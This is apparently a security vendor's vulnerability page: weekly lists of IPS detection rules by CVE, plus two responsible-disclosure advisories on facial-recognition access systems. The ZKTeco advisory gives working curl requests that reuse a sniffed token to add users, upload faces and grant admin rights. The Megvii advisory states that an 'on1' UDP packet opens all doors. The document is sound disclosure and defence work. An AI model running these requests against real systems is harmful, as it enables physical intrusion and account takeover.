Todas as vulnerabilidades

  • 20-042 (September 1, 2020)
     Data de publicação:  02 de septiembre de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DCERPC Services
    1010164* - Identified Possible Ransomware File Extension Create Activity Over Network Share


    Docker Daemon
    1010326* - Identified Docker Daemon Remote API Call


    HP Intelligent Management Center (IMC)
    1010481 - Apache OFBiz XML-RPC Request Unsafe Deserialization Vulnerability (CVE-2020-9496)


    Oracle SQL Net (TNS) Listener
    1010475 - Oracle Database Server XML External Entity Injection Vulnerability (CVE-2014-6577)


    Web Application Common
    1010483 - Dolibarr ERP CRM Remote Code Execution Vulnerability (CVE-2019-11200)
    1010484 - Dolibarr ERP CRM Remote Code Execution Vulnerability (CVE-2019-11201)
    1010482 - Identified Reflected File Download Attack in URI Query Parameter
    1005934* - Identified Suspicious Command Injection Attack
    1010488 - Identified WordPress Database Reset Attempt
    1010225* - Liferay Portal Untrusted Deserialization Vulnerability (CVE-2020-7961)
    1010440* - OpenMRS Reflected Cross-Site Scripting Vulnerability (CVE-2020-5730)


    Web Application PHP Based
    1010212 - LibreNMS Collectd Command Injection Vulnerability (CVE-2019-10669)


    Web Client Common
    1008702* - Microsoft Windows GDI Information Disclosure Vulnerability (CVE-2017-11816)
    1008171* - Microsoft Windows Graphics Component Information Disclosure Vulnerability (CVE-2017-0038)
    1010469* - TeamViewer Desktop Remote Code Execution Vulnerability (CVE-2020-13699)


    Web Client Internet Explorer/Edge
    1008211* - Microsoft Edge Information Disclosure Vulnerability (CVE-2017-0065)


    Web Server Apache
    1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)


    Web Server Common
    1010412* - Bolt CMS Authenticated Remote Code Execution Vulnerability
    1000131* - HTTP Header Length Restriction
    1010477 - Java Unserialize Remote Code Execution Vulnerability - 1
    1010445* - Opmantek Open-AudIT Command Injection Vulnerability (CVE-2020-12078)


    Web Server HTTPS
    1010479 - Malware Ngioweb


    Web Server Miscellaneous
    1010463* - Solarwinds Virtualization Manager Apache Commons Collections Insecure Deserialization Vulnerability (CVE-2016-3642)


    Web Server Oracle
    1010474* - Oracle WebLogic Server IIOP Protocol Insecure Deserialization Vulnerability (CVE-2020-14625)
    1010485 - Oracle WebLogic Server IIOP Protocol Insecure Deserialization Vulnerability (CVE-2020-14644)
    1010478 - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14644)
    1010447* - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14645)


    Web Server SharePoint
    1010335* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2020-1181)


    Zoho ManageEngine
    1010448* - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-15533)
    1010337 - Zoho ManageEngine OpManager Directory Traversal Vulnerability (CVE-2020-12116)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 20-041 (August 25, 2020)
     Data de publicação:  26 de agosto de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    IBM WebSphere Application Server
    1010343* - IBM WebSphere UploadFileArgument Deserialization Vulnerability (CVE-2020-4448)


    Plex Media Server
    1010434* - Plex Media Server Remote Code Execution Vulnerability (CVE-2020-5741)


    SSL Client
    1010471 - Identified Weak 'Encryption Key' in New Session Ticket TLS Record
    1010437* - Python SSL 'DistributionPoint Extension' NULL Pointer Dereference Vulnerability (CVE-2019-5010)


    Web Application Common
    1010368* - Dolibarr ERP And CRM Cross Site Scripting Vulnerability (CVE-2020-13094)
    1010225* - Liferay Portal Untrusted Deserialization Vulnerability (CVE-2020-7961)
    1010440 - OpenMRS Reflected Cross-Site Scripting Vulnerability (CVE-2020-5730)
    1009350* - Telerik UI for ASP.NET AJAX Multiple Arbitrary File Upload Vulnerabilities (CVE-2017-11357 and CVE-2017-11317)
    1010344* - ThinkPHP Remote Code Execution Vulnerability (CVE-2019-9082)
    1010074* - Unsecured Credentials - Cloud Instance Metadata API (ATT&CK T1552.005)


    Web Application Tomcat
    1010457* - Apache Tomcat WebSocket Infinite Loop Denial Of Service Vulnerability (CVE-2020-13935)


    Web Client Common
    1010148* - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-05) - 1
    1010467 - Microsoft Graphics Components Remote Code Execution Vulnerability (CVE-2020-1561)
    1010466 - Microsoft Windows Codecs Library Remote Code Execution Vulnerability (CVE-2020-1560)
    1010468 - Microsoft Windows Font Driver Host Remote Code Execution Vulnerability (CVE-2020-1520)
    1010476 - Microsoft Windows MSI File Signature Spoofing Vulnerability (CVE-2020-1464)
    1010464 - Microsoft Windows Media Foundation Memory Corruption Vulnerability (CVE-2020-1492)
    1009067* - Microsoft Windows VBScript Engine Remote Code Execution Vulnerability (CVE-2018-8174)
    1010469 - TeamViewer Desktop Remote Code Execution Vulnerability (CVE-2020-13699)


    Web Client Internet Explorer/Edge
    1010470 - Microsoft Edge Scripting Engine Memory Corruption Vulnerability (CVE-2020-1555)


    Web Server Apache
    1004824* - Apache HTTP Server 'mod_proxy' Reverse Proxy Exposure (CVE-2011-3368)
    1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)


    Web Server Common
    1004859* - Blocked HTTP Header: Request Contains Header Not Present In Approved Header List
    1010412 - Bolt CMS Authenticated Remote Code Execution Vulnerability
    1010445 - Opmantek Open-AudIT Command Injection Vulnerability (CVE-2020-12078)
    1010416* - Pandora FMS Events Remote Command Execution Vulnerability (CVE-2020-13851)
    1010459* - vBulletin 'subwidgetConfig' Unauthenticated Remote Code Execution Vulnerability (CVE-2020-17496)


    Web Server Miscellaneous
    1010463 - Solarwinds Virtualization Manager Apache Commons Collections Insecure Deserialization Vulnerability (CVE-2016-3642)


    Web Server Oracle
    1010474 - Oracle WebLogic Server IIOP Protocol Insecure Deserialization Vulnerability (CVE-2020-14625)
    1010415* - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14625)


    Zoho ManageEngine
    1010448 - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-15533)


    Integrity Monitoring Rules:

    1010422 - SCP - Remote File Copy (ATT&CK T1105, T1048.001)


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 improper privilege vulnerability
     Schweregrad: :    
     Data de publicação:  19 de agosto de 2020

    A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.

    The vulnerability has been submitted to ZDI on Dec 3, 2019.

    ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure was expired on April 30, 2020.

    Details

    ZKBiosecurity Server does not do client authentication except the long-lasting token (cf. CVE-2020-17473). One has to identify which FaceDepot tablet is allowed to register a new user by sniffing the network for a period of time. After obtaining the token of the tablet, one is able to

    1. Add a new arbitrary user (who may enter the office),
    2. Upload a new picture (allow an adversary to physically infiltrate),
    3. Delete an account (after a mission),
    4. Escalate the privilege of the new use user admin (able to operate / configure the tablet in front of it.)

    Add a new user

    --------------
    curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
        -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
        -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post
    
    Where the content of bugoy.user.post is (tab separated):
    
    user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy	privilege=0	disable=0	verify=0
    

    Upload a new picture to the server

    ----------------------------------
    curl -XPOST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060016&table=tabledata&tablename=biophoto&count=1' \
    	-b 'token=8bd7f4495e0ac8781f4bba195827fcda' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    	-H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@totoro.post
    

    The content of totoro.post is a bit tricky, because the picture is in base64:

    biophoto	pin=	filename=.jpg	type=	size=	content=
    

    After a new picture is uploaded, wait until a scheduled time where all FaceDepot tablets are synchronized or when the admin clicks "Update" on the screen.

    Escalate the privilege to admin
    -------------------------------

    Users with "privilege=14" have the admin access to FaceDepot tablet. With the privilege, one can configure the tablet in front of it, to add users, set user privilege, delete users, browse user database, install APK via USB (exposed at the bottom of FaceDepot 7B), and switch to apps other than ZKTeco launcher.

    curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
        -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
        -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@admin.post
    

    Where the content of admin.post is (tab separated):

    user uuid=2645	cardno=	pin=12345	password=	group=1	starttime=0 	endtime=0	name=Bugoy	privilege=14	disable=0	verify=0
    

    Vulnerability Type
    CWE-269: Improper Privilege Management

    Attack Type: Remote

    Impact Information Disclosure: True

    Attack Vectors
    The attacker must have access to LAN and use cURL to send HTTP GET/POST.
    The attack can be conducted by calling API commands with a long-lasting token.

    Mitigation
    Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.
    Deny all unlisted access.

    Discoverer: Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

    Reference: https://www.zkteco.com/en/product_detail/FaceDepot-7B.html

  • Megvii Koala 2.9.1-c3s architectural vulnerability on network relays
     Schweregrad: :    
     Data de publicação:  19 de agosto de 2020

    Lack of authentication in the network relays used in MEGVII Koala 2.9.1-c3sallows attackers to grant physical access to anyone by sending packet data to UDP port 5000 of any network relays connected to doors.

    The vulnerability has been submitted to ZDI on March 20, 2020 as ZDI-CAN-10793.

    The vendor has acknowledged and confirmed the vulnerability and said the production has reached end-of-line while a patch is available in newer products. We are not able to confirm the vendor's statement.The vendor has published a public advisory and asks the customers to upgrade the software when it is available.

    Product lines impacted by similar vulnerability will have patches in August 2020.

    Details

    Megvii Koala is a facial recognition system sold by Megvii. It is marketed towards factory, company concierge, apartment complex, etc. There are several hardware configurations, depending on the system integrator.

    The weakness is in the architecture of the Megvii Koala system. The weakest link is the network relay, which has to be either HHT-NET2D or TCP-KP-I404. When an adversary has access to the internal network, one has only to send the string "on1" to UDP port 5000 of all the devices in the network to open all the doors.

    The architecture, according to the instruction manual provided by the vendor, is like,

         ----------------------------     UDP 5000                COM/ON/OFF
        |  ---------         ------  | --------------> HHT-NET2D ------------> Door
        | | Backend | <---> | Edge | |
        |  ---------         ------  | <--- HTTP ----> Samsung Tablet
         ----------------------------    USB-C Cable
    

    To our best knowledge, no firewall is recommended in user instruction manuals.


    Vulnerability Type
    CWE-862: Missing Authorization

    Attack Type: Remote

    Attack Vectors
    To exploit vulnerability, attackers have to have access to LAN of the facial recognition access controller.

    Mitigation
    Deploy a firewall in front of network relays and allow UDP 5000 from Megvii edge server only.
    Deny all other connections.

    Discoverer
    Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer


    Reference
    Public advisory from the vendor: http://techsupport.megvii.com/hc/kb/article/1401343/

  • 20-040 (August 18, 2020)
     Schweregrad: :    
     Data de publicação:  19 de agosto de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    ActiveMQ OpenWire
    1010428* - Apache ActiveMQ Unsafe Deserialization Vulnerability (CVE-2015-5254)


    DNS Client
    1010352* - Data Exfiltration Over DNS (Response) Protocol (T1048)


    Plex Media Server
    1010434 - Plex Media Server Remote Code Execution Vulnerability (CVE-2020-5741)


    SSL Client
    1010437 - Python SSL 'DistributionPoint Extension' NULL Pointer Dereference Vulnerability (CVE-2019-5010)


    Suspicious Server Application Activity
    1003593* - Detected SSH Server Traffic (ATT&CK T1021)
    1010462 - Malware Drovorub


    Web Application Common
    1010368 - Dolibarr ERP And CRM Cross Site Scripting Vulnerability (CVE-2020-13094)
    1010391* - Expat XML Parsing Buffer Overflow Vulnerability (CVE-2016-0718) - Server


    Web Application Tomcat
    1010457 - Apache Tomcat WebSocket Infinite Loop Denial Of Service Vulnerability (CVE-2020-13935)
    1010444 - Identified Too Many Incoming HTTP/2 Requests


    Web Client Common
    1010456 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-48) - 1
    1010452 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-48) - 2
    1010451 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-48) - 3
    1010460 - Google Chrome 'BlobRegistryImpl' Use-After-Free Vulnerability (CVE-2020-6461)
    1010453 - Microsoft Windows Codecs Library Remote Code Execution Vulnerability (CVE-2020-1574)
    1010454 - Microsoft Windows Codecs Library Remote Code Execution Vulnerability (CVE-2020-1585)
    1010455 - Microsoft Windows DirectWrite Information Disclosure Vulnerability (CVE-2020-1577)


    Web Server Apache
    1010461 - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)


    Web Server Common
    1006540* - Enable X-Forwarded-For HTTP Header Logging
    1010418* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2020-1147)
    1010416 - Pandora FMS Events Remote Command Execution Vulnerability (CVE-2020-13851)
    1010443* - rConfig 'Devicemgmt.php' Cross-Site Scripting Vulnerability (CVE-2020-12256)
    1010459 - vBulletin 'subwidgetConfig' Unauthenticated Remote Code Execution Vulnerability (CVE-2020-17496)


    Web Server Miscellaneous
    1010346* - Identified HTTP Request With HTTP/0.9 In Request Line


    Web Server Oracle
    1010447 - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14645)


    ZohoCorp ManageEngine Desktop Central
    1010407* - Zoho ManageEngine Desktop Central AppDependency Arbitrary File Write Vulnerability (CVE-2020-10859)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    1008852* - Auditd
  • 20-039 (August 11, 2020)
     Schweregrad: :    
     Data de publicação:  12 de agosto de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    ActiveMQ OpenWire
    1010428 - Apache ActiveMQ Unsafe Deserialization Vulnerability (CVE-2015-5254)


    DCERPC Services
    1010426 - Identified Domain-Level Account Discovery Over SMB (ATT&CK T1087)
    1009703* - Identified Domain-Level Permission Groups Discovery Over SMB (ATT&CK T1069)
    1010430 - Identified Remote System Discovery Over SMB (ATT&CK T1018)


    Directory Server LDAP
    1010433 - Identified Remote System Discovery Over LDAP (ATT&CK T1018)
    1010350* - VMware vCenter Server Access Control Bypass Vulnerability (CVE-2020-3952)


    HP Intelligent Management Center (IMC)
    1010425* - Apache OFBiz Cross-Site Scripting Vulnerability (CVE-2020-1943)
    1009947* - HPE Intelligent Management Center Various Expression Language Injection Vulnerabilities


    Port Mapper Windows
    1001033* - Windows Port Mapper Decoder


    Suspicious Server Ransomware Activity
    1010438 - Ransomware Foxware


    Unix SSH
    1005748* - Multiple SSH Connections Detected (ATT&CK T1498.001, T1110)


    Web Application Common
    1000552* - Generic Cross Site Scripting(XSS) Prevention
    1005402* - Identified Suspicious User Agent In HTTP Request
    1010199* - Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability (CVE-2020-0618)
    1010423* - Primetek Primefaces Remote Code Execution Vulnerability (CVE-2017-1000486)


    Web Client Common
    1010435 - FFmpeg Heap-based Buffer Overflow Vulnerability (CVE-2020-12284)
    1004715* - HTTP Web Client Decoding
    1010436 - LibTIFF LZWDecode Null Pointer Dereference Vulnerability (CVE-2018-18661)
    1010446 - Microsoft Windows 'hevcdecoder_store' HEIC File Parsing Out-Of-Bounds Read Vulnerability (ZDI-20-906)


    Web Client Internet Explorer/Edge
    1010442 - Microsoft Internet Explorer Remote Code Execution Vulnerability (CVE-2020-1567)
    1010441 - Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2020-1380)
    1010439 - Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2020-1570)


    Web Server Common
    1010178* - Cisco Data Center Network Manager Directory Traversal Vulnerability (CVE-2019-15981)
    1010443 - rConfig 'Devicemgmt.php' Cross-Site Scripting Vulnerability (CVE-2020-12256)


    Windows Services RPC Server DCERPC
    1010431 - Identified Remote System Discovery Over LSARPC (ATT&CK T1018)


    ZohoCorp ManageEngine Desktop Central
    1010407 - Zoho ManageEngine Desktop Central AppDependency Arbitrary File Write Vulnerability (CVE-2020-10859)
    1010197* - Zoho ManageEngine Desktop Central Remote Code Execution Vulnerability (CVE-2020-10189)


    Integrity Monitoring Rules:

    1003019* - Trend Micro Deep Security Agent / Relay


    Log Inspection Rules:

    1002828* - Application - Secure Shell Daemon (SSHD)
    1008852* - Auditd
    1002815* - Authentication Module - Unix Pluggable Authentication Module
  • 20-037 (July 30, 2020)
     Schweregrad: :    
     Data de publicação:  31 de julio de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Web Application PHP Based
    1010338* - PHP-Fusion Administration Banner Stored Cross-Site Scripting Vulnerability (CVE-2020-12438)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 20-036 (July 30, 2020)
     Schweregrad: :    
     Data de publicação:  31 de julio de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Web Application PHP Based
    1010338* - PHP-Fusion Administration Banner Stored Cross-Site Scripting Vulnerability (CVE-2020-12438)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 20-035 (July 28, 2020)
     Schweregrad: :    
     Data de publicação:  29 de julio de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DCERPC Services - Client
    1010394* - Microsoft Windows LNK Remote Code Execution Vulnerability Over SMB (CVE-2020-1421)


    DNS Client
    1010406* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2020-1350) - Client


    DNS Server
    1010293* - ISC BIND TSIG Denial-of-Service Vulnerability (CVE-2020-8617)
    1010401* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2020-1350) - Server


    Directory Server LDAP
    1010321* - OpenLDAP slapd Nested Filter Stack Overflow Vulnerability (CVE-2020-12243)


    MQTT Server
    1010357* - Eclipse Mosquitto Improper Authentication Vulnerability (CVE-2017-7650)


    Oracle E-Business Suite Web Interface
    1010360* - Oracle E-Business Suite Advanced Outbound Telephony Cross Site Scripting Vulnerability (CVE-2020-2871)
    1010367* - Oracle E-Business Suite Advanced Outbound Telephony Cross-Site Scripting Vulnerability (CVE-2020-2854)
    1010383* - Oracle E-Business Suite Advanced Outbound Telephony Cross-Site Scripting Vulnerability (CVE-2020-2856)


    SAP NetWeaver Java Application Server
    1010409* - Identified SAP NetWeaver AS JAVA Authentication Attempt
    1010417 - SAP NetWeaver AS JAVA Authentication Bypass Vulnerability (CVE-2020-6287)
    1010413* - SAP NetWeaver AS JAVA Directory Traversal Vulnerability (CVE-2020-6286)


    SSL Client
    1010410 - OpenSSL Large DH Parameter Denial Of Service Vulnerability (CVE-2018-0732)


    Web Application Common
    1010377* - Centreon 'RRDdatabase_status_path' Command Injection Vulnerability (CVE-2020-13252)
    1010345 - Kentico CMS Staging SyncServer Unserialize Remote Command Execution Vulnerability (CVE-2019-10068)
    1010372* - Opmantek Open-AudIT Cross Site Scripting Vulnerability (CVE-2020-12261)
    1010354* - Pandora FMS Ping Authenticated Remote Code Execution Vulnerability
    1010423 - Primetek Primefaces Remote Code Execution Vulnerability (CVE-2017-1000486)
    1010252* - Sonatype Nexus Repository Manager Stored Cross-Site Scripting Vulnerability (CVE-2020-10203)


    Web Application PHP Based
    1010359* - WordPress 'bbPress' Plugin Unauthenticated Privilege Escalation Vulnerability (CVE-2020-13693)
    1010341* - Wordpress Drag and Drop Multi File Uploader Remote Code Execution Vulnerability (CVE-2020-12800)


    Web Application Ruby Based
    1010384* - Lodash Node Module Modification Of Assumed-Immutable Data (MAID) Vulnerability (CVE-2018-3721)


    Web Client Common
    1010261* - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-24) - 1
    1010420 - Microsoft .NET And Visual Studio Remote Code Execution Vulnerability (CVE-2020-1147)
    1010424 - Microsoft Windows LNK Remote Code Execution Vulnerability Over HTTP (CVE-2020-1421)
    1010395* - Microsoft Windows LNK Remote Code Execution Vulnerability Over WebDAV (CVE-2020-1421)
    1010414 - Oracle Java Runtime Environment HTML Rendering Out-Of-Bounds Write Vulnerability (CVE-2020-14664)
    1010419 - Oracle Java SE Ligature Substitution Glyph Storage Out Of Bounds Memory Access (CVE-2015-0469)


    Web Server Common
    1010374* - Cayin CMS NTP Server Remote Code Execution Vulnerability (CVE-2020-7357)
    1010175* - Cross-Site Scripting (XSS) Decoder
    1010388* - F5 BIG-IP TMUI Remote Code Execution Vulnerability (CVE-2020-5902)
    1010418 - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2020-1147)
    1010376* - Opmantek Open-AudIT Command Injection Vulnerability (CVE-2020-11941)
    1010362* - VMware Cloud Director Code Injection Vulnerability (CVE-2020-3956)
    1010342* - Zoho ManageEngine OpManager Cachestart Directory Traversal Vulnerability (CVE-2020-13818)
    1010387* - rConfig Network Device Configuration Tool SQL Injection Vulnerability (CVE-2020-10547)
    1010386* - rConfig Network Device Configuration Tool SQL Injection Vulnerability (CVE-2020-10549)
    1010378* - rConfig SQL Injection Vulnerability (CVE-2020-10546)
    1010366* - vBulletin 'widgetConfig' Unauthenticated Remote Code Execution Vulnerability (CVE-2019-16759)


    Web Server Oracle
    1010415 - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14625)


    Web Server SharePoint
    1010398* - Microsoft SharePoint Scorecards Remote Code Execution Vulnerability (CVE-2020-1439)


    Integrity Monitoring Rules:

    1003020* - Trend Micro Deep Security Manager


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 20-034 (July 21, 2020)
     Schweregrad: :    
     Data de publicação:  22 de julio de 2020
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DCERPC Services
    1007021* - Remote Registry Access Through SMBv2 Protocol Detected (ATT&CK T1012)


    DCERPC Services - Client
    1004373* - Identified DLL Side Loading Attempt Over Network Share (ATT&CK T1073)
    1010106* - Identified Downloading Of PowerShell Scripts Through SMB Share (ATT&CK T1086)


    DNS Client
    1010352 - Data Exfiltration Over DNS (Response) Protocol (ATT&CK T1048)


    LDAP Client
    1009112 - PHP LDAP 'ldap_get_dn' Denial Of Service Vulnerability (CVE-2018-10548)


    SAP NetWeaver Java Application Server
    1010409 - Identified SAP NetWeaver AS JAVA Authentication Attempt
    1010413 - SAP NetWeaver AS JAVA Directory Traversal Vulnerability (CVE-2020-6286)


    Web Application Common
    1010344 - ThinkPHP Remote Code Exection Vulnerability (CVE-2019-9082)


    Web Application PHP Based
    1010375 - WordPress 10Web Photo Gallery Plugin SQL Injection Vulnerability


    Web Application Ruby Based
    1010411 - Ruby On Rails Remote Code Execution Vulnerability (CVE-2020-8163)


    Web Server Apache
    1010400 - Apache Httpd Mod Rewrite Open Redirects Vulnerability (CVE-2019-10098)


    Web Server Common
    1006540* - Enable X-Forwarded-For HTTP Header Logging
    1010388* - F5 BIG-IP TMUI Remote Code Execution Vulnerability (CVE-2020-5902)
    1000473* - Parameter Name Length Restriction


    Windows Remote Management
    1009894* - Powershell Remote Command Execution Via WinRM - HTTP (Request) (ATT&CK T1028)
    1010048* - WinRM Service Detected & Powershell RCE Over HTTP (ATT&CK T1028)


    ZeroMQ Message Transport Protocol (ZMTP)
    1010265* - SaltStack Salt Authorization Weakness Vulnerability (CVE-2020-11651)


    Integrity Monitoring Rules:

    1008271* - Application - Docker


    Log Inspection Rules:

    1008852* - Auditd
    1010390 - Microsoft Windows User Logon Events